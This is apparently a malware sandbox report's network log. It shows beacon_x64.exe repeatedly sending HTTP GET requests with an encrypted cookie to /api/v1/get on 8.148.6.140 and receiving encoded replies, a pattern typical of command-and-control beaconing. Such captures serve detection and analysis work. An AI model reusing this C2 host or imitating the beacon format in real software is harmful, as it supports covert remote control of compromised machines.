Jan 10, 2025 09:28:44.248109102 CET	80	50116	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:44.248128891 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.248173952 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.248619080 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.253403902 CET	80	50116	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:44.359812975 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.364705086 CET	80	50117	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:44.364788055 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.368863106 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:44.373617887 CET	80	50117	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:45.325989008 CET	80	50117	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:45.326076984 CET	80	50117	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:45.326081991 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.326123953 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.326283932 CET	50117	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.331304073 CET	80	50117	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:45.431740046 CET	50118	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.436703920 CET	80	50118	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:45.437031984 CET	50118	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.437031984 CET	50118	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:45.442095995 CET	80	50118	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:49.446954012 CET	50118	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:49.557066917 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:49.561933041 CET	80	50119	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:49.562010050 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:49.562189102 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:49.566932917 CET	80	50119	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:50.534225941 CET	80	50119	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:50.534249067 CET	80	50119	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:50.534373045 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.534373045 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.534574986 CET	50119	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.539340019 CET	80	50119	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:50.650964022 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.655751944 CET	80	50120	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:50.659037113 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.659215927 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:50.663975000 CET	80	50120	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:51.627871990 CET	80	50120	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:51.627932072 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.627958059 CET	80	50120	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:51.628032923 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.628329992 CET	50120	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.633095980 CET	80	50120	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:51.744725943 CET	50121	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.749540091 CET	80	50121	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:51.749610901 CET	50121	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.749761105 CET	50121	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:51.754576921 CET	80	50121	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:55.741293907 CET	50121	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:55.855789900 CET	50122	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:55.860656977 CET	80	50122	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:55.860744953 CET	50122	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:55.860958099 CET	50122	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:55.865700960 CET	80	50122	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:56.808726072 CET	80	50122	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:56.808911085 CET	80	50122	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:56.809717894 CET	50122	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:56.810079098 CET	50122	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:56.814847946 CET	80	50122	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:56.917448997 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:56.922260046 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:56.927175045 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:56.927175045 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:56.931972980 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:57.919013023 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:57.919089079 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:57.919183016 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:57.919234991 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:57.919235945 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:57.919281960 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:57.919481993 CET	50123	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:57.924279928 CET	80	50123	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:58.036817074 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:58.041655064 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:58.041734934 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:58.042006969 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:58.046775103 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:29:02.417078018 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:29:02.417102098 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:29:02.417113066 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:29:02.417191029 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:29:02.417191029 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:29:02.417269945 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:29:02.417567015 CET	80	50124	8.148.6.140	192.168.2.6
Jan 10, 2025 09:29:02.417629957 CET	50124	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:29:02.426068068 CET	80	50124	8.148.6.140	192.168.2.6

HTTP Request Dependency Graph

8.148.6.140

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:24:57.372459888 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:24:58.357806921 CET	313	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:24:58 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 79 31 43 61 54 66 2f 6d 73 57 51 35 34 4f 52 47 6b 70 48 31 67 52 32 49 37 56 5a 44 47 78 57 77 34 48 61 55 37 50 65 46 61 66 79 77 2f 47 58 73 72 4f 6f 32 62 74 78 63 33 4d 54 50 7a 42 6b 74 34 49 38 62 42 59 68 4d 45 61 6f 63 54 38 78 34 59 72 62 2f 49 6d 4a 6d 38 53 79 30 46 78 38 73 33 54 69 77 4c 34 4b 6c 48 49 4a 43 38 56 30 4c 4d 71 77 44 77 69 6f 78 44 58 33 4e 33 4f 70 76 Data Ascii: y1CaTf/msWQ54ORGkpH1gR2I7VZDGxWw4HaU7PeFafyw/GXsrOo2btxc3MTPzBkt4I8bBYhMEaocT8x4Yrb/ImJm8Sy0Fx8s3TiwL4KlHIJC8V0LMqwDwioxDX3N3Opv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49710	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:24:58.482283115 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:00.032339096 CET	377	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:24:59 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 42 71 79 6d 37 69 69 68 2f 75 33 46 6f 50 62 70 5a 4e 42 37 64 70 45 71 6c 58 50 76 56 38 76 6e 41 30 62 64 46 59 54 71 4d 43 59 7a 2b 48 78 6c 31 48 45 6b 53 70 72 36 4e 43 37 4b 31 67 6c 6c 4c 6c 4c 67 50 4b 72 32 50 37 42 4a 54 46 7a 6f 37 63 73 4a 78 61 61 7a 4e 47 62 43 6c 58 75 34 65 38 7a 51 6c 72 42 53 34 51 66 56 46 65 36 7a 56 34 6b 4a 45 41 42 53 46 57 57 79 6c 47 59 54 75 43 6f 36 2b 58 32 50 77 4a 6d 6d 77 41 4d 58 57 53 4b 58 76 59 37 46 42 48 39 2f 58 55 74 46 6a 70 36 6e 61 47 41 7a 45 2b 53 57 72 75 6c 4f 48 68 52 7a 4f 71 31 36 37 34 52 6a 66 46 4b 61 Data Ascii: Bqym7iih/u3FoPbpZNB7dpEqlXPvV8vnA0bdFYTqMCYz+Hxl1HEkSpr6NC7K1gllLlLgPKr2P7BJTFzo7csJxaazNGbClXu4e8zQlrBS4QfVFe6zV4kJEABSFWWylGYTuCo6+X2PwJmmwAMXWSKXvY7FBH9/XUtFjp6naGAzE+SWrulOHhRzOq1674RjfFKa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49711	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:00.155724049 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:04.134390116 CET	377	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:03 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 64 31 36 69 4c 5a 44 6b 52 4d 42 56 53 4b 65 37 32 54 50 6d 52 45 34 69 50 71 6f 34 61 2b 4b 44 4d 4e 71 55 69 73 72 4d 4d 48 76 67 47 71 30 64 64 46 44 7a 49 31 70 54 78 58 43 76 39 48 78 4f 74 44 5a 42 47 79 31 52 6a 73 4d 35 72 64 73 35 76 45 35 34 6d 69 79 77 68 66 33 6e 4b 78 35 57 72 65 53 64 61 72 62 53 31 31 35 47 68 72 65 63 59 64 6f 4f 4b 59 59 57 43 41 5a 56 45 6b 34 67 62 6b 31 56 45 56 6f 65 73 4b 46 4e 4c 42 50 6e 65 43 78 6f 56 34 36 76 34 53 4f 43 6f 79 59 55 39 5a 30 72 76 54 54 72 38 53 64 4d 64 50 47 32 64 4a 30 36 4b 51 4d 6d 54 6c 46 37 39 68 7a 6a Data Ascii: d16iLZDkRMBVSKe72TPmRE4iPqo4a+KDMNqUisrMMHvgGq0ddFDzI1pTxXCv9HxOtDZBGy1RjsM5rds5vE54miywhf3nKx5WreSdarbS115GhrecYdoOKYYWCAZVEk4gbk1VEVoesKFNLBPneCxoV46v4SOCoyYU9Z0rvTTr8SdMdPG2dJ06KQMmTlF79hzj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49714	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:04.248008966 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:05.225856066 CET	272	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:05 GMT Server: nginx Content-Length: 88 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2b 44 6a 73 52 78 58 76 39 52 43 4b 63 4a 42 46 4e 75 75 6b 2b 31 2f 52 53 46 73 4f 43 2f 71 6e 6a 48 2f 68 49 56 44 6e 68 37 6e 71 57 30 66 6e 55 32 41 6a 52 6f 5a 59 58 7a 4b 66 6b 7a 2f 64 41 4a 6c 68 54 77 56 52 5a 78 71 65 49 4a 4c 50 44 63 73 6f 4f 51 3d 3d Data Ascii: +DjsRxXv9RCKcJBFNuuk+1/RSFsOC/qnjH/hIVDnh7nqW0fnU2AjRoZYXzKfkz/dAJlhTwVRZxqeIJLPDcsoOQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49721	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:05.341588974 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:06.302859068 CET	248	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:06 GMT Server: nginx Content-Length: 64 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 4f 32 68 48 48 63 67 54 78 6f 2b 38 34 56 69 4c 6f 65 39 48 65 30 38 4a 46 35 6e 77 66 32 68 39 2b 6c 53 54 54 7a 74 6f 38 75 4d 66 79 79 6e 56 6c 52 76 70 4f 35 55 46 74 4f 78 36 38 50 76 79 Data Ascii: O2hHHcgTxo+84ViLoe9He08JF5nwf2h9+lSTTzto8uMfyynVlRvpO5UFtOx68Pvy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49731	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:06.419847012 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:07.390146971 CET	377	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:07 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 4b 47 6b 6d 49 56 50 44 4f 62 74 58 42 63 4f 30 4a 5a 46 73 46 67 35 45 6d 64 2b 54 6c 56 58 59 33 67 4b 4b 50 65 35 6a 75 4f 62 78 53 55 30 49 43 64 47 35 64 6a 6e 42 34 54 49 37 58 4a 30 47 2b 4d 55 4a 75 79 51 71 52 70 47 58 45 70 4e 42 63 78 53 37 50 57 4c 63 4a 7a 41 37 46 42 4f 63 44 45 4b 6e 76 57 69 5a 42 48 73 72 65 2b 30 51 61 47 30 2f 50 6b 71 4f 6a 62 56 56 57 42 71 4f 74 4c 52 72 55 46 5a 6c 4b 38 5a 76 39 51 6b 41 78 4f 72 4f 75 65 72 4f 57 36 36 58 56 34 49 6b 6a 6e 45 36 76 52 52 70 68 4a 43 74 6c 35 66 4f 5a 4e 76 36 46 72 38 7a 61 7a 41 38 55 69 50 52 Data Ascii: KGkmIVPDObtXBcO0JZFsFg5Emd+TlVXY3gKKPe5juObxSU0ICdG5djnB4TI7XJ0G+MUJuyQqRpGXEpNBcxS7PWLcJzA7FBOcDEKnvWiZBHsre+0QaG0/PkqOjbVVWBqOtLRrUFZlK8Zv9QkAxOrOuerOW66XV4IkjnE6vRRphJCtl5fOZNv6Fr8zazA8UiPR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49737	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:07.498735905 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:11.480207920 CET	357	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:11 GMT Server: nginx Content-Length: 172 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 71 46 4d 33 68 2f 62 77 46 76 42 46 76 47 67 35 39 61 30 57 66 54 32 4c 73 4a 47 43 6c 55 78 47 79 67 4d 68 44 59 70 2b 4d 73 47 6b 75 37 6d 64 7a 63 35 57 52 42 77 6f 41 38 6a 74 6b 57 70 52 56 73 43 54 73 35 78 64 46 6f 4d 71 4c 6f 4c 38 48 7a 5a 70 62 74 52 52 4c 63 35 32 2b 66 7a 44 66 71 36 69 58 77 55 63 7a 6b 46 43 33 2f 69 55 7a 61 79 48 49 79 4e 37 45 7a 44 7a 44 36 32 77 44 6c 6f 78 6d 48 52 53 4a 45 67 75 76 61 4b 34 6a 64 59 56 6c 52 5a 55 46 65 71 66 5a 6d 73 6a 32 49 62 56 68 6a 6f 72 33 51 51 3d Data Ascii: qFM3h/bwFvBFvGg59a0WfT2LsJGClUxGygMhDYp+MsGku7mdzc5WRBwoA8jtkWpRVsCTs5xdFoMqLoL8HzZpbtRRLc52+fzDfq6iXwUczkFC3/iUzayHIyN7EzDzD62wDloxmHRSJEguvaK4jdYVlRZUFeqfZmsj2IbVhjor3QQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49765	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:11.591334105 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:12.575119972 CET	184	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:12 GMT Server: nginx Content-Length: 88 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:25:12.575289011 CET	88	IN	Data Raw: 34 55 36 7a 44 64 41 36 30 76 52 48 4d 48 34 62 74 72 78 31 39 77 7a 6e 68 58 36 2f 30 75 79 57 71 68 54 35 4f 5a 67 41 76 73 7a 50 76 71 6d 46 34 6d 38 75 63 76 62 4c 78 63 66 58 45 7a 4e 6d 69 53 31 61 47 49 37 4f 34 78 78 79 70 78 43 6a 6b 43 Data Ascii: 4U6zDdA60vRHMH4btrx19wznhX6/0uyWqhT5OZgAvszPvqmF4m8ucvbLxcfXEzNmiS1aGI7O4xxypxCjkCbFfA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49778	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:12.685149908 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:13.646812916 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:13 GMT Server: nginx Content-Length: 384 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:25:13.646960974 CET	384	IN	Data Raw: 6e 59 54 32 73 4f 4a 59 6b 31 76 59 52 6b 46 4e 6c 69 61 6b 56 63 48 6e 48 35 4e 6f 35 4a 39 59 7a 7a 79 44 79 75 61 64 65 32 6f 78 4b 5a 67 50 53 53 72 72 65 6a 5a 4e 50 64 43 4e 36 53 4a 67 67 6a 46 5a 32 68 70 32 30 7a 7a 33 4b 48 48 77 30 4d Data Ascii: nYT2sOJYk1vYRkFNliakVcHnH5No5J9YzzyDyuade2oxKZgPSSrrejZNPdCN6SJggjFZ2hp20zz3KHHw0MFBUgDhdR+YDf8+pWKagelBwk+PEHEJj5n89mTXXdYKtGLQu4dpOBMM/gJYxvVJu3Y9v9FDLBUYY7FSC1fylUOq/MeOxoPVQ2dS7d+ekUwkysNoWHavo7CC+pFLgoeNb8LGmg6HVoXXDPCjYW2pfsFHpZavDLzN3sb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49786	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:13.763993025 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:14.756736994 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:14 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 39 30 75 4e 66 58 76 37 68 6c 5a 6b 77 6f 4c 4f 72 76 33 6e 31 56 38 46 6b 4a 5a 2f 76 66 33 41 66 62 45 42 38 6b 6e 72 6f 43 69 30 4c 57 41 31 4b 4d 2b 43 53 36 39 49 33 75 64 39 41 35 43 38 6e 30 6e 4a 6a 6e 68 73 4e 4f 55 32 37 72 67 49 50 2f 30 78 43 45 4e 37 30 4d 61 43 6b 77 42 39 51 57 36 32 4f 39 62 73 5a 68 65 41 69 67 58 67 44 71 67 4a 31 43 48 61 39 36 65 4f 46 63 52 34 6f 52 49 48 35 47 6d 56 6d 54 65 2f 2f 49 6a 30 2f 36 64 32 54 6e 4e 63 65 78 45 42 6e 36 51 2b 51 5a 42 56 34 53 4e 4a 32 6a 68 79 4a 50 7a 77 68 76 57 2f 69 65 6e 54 45 4d 51 68 78 31 59 35 6e 47 56 52 63 31 71 7a 73 49 6b 4b 78 4f 53 41 35 45 43 2f 65 44 7a 63 44 78 6a 32 30 64 6b 4c 64 6d 4a 2f 59 32 50 78 68 59 35 79 4b 63 45 71 63 7a 30 2f 7a 33 48 61 38 42 52 4c 4b 4a 45 5a 64 63 69 47 31 4f 70 48 38 4d 36 43 38 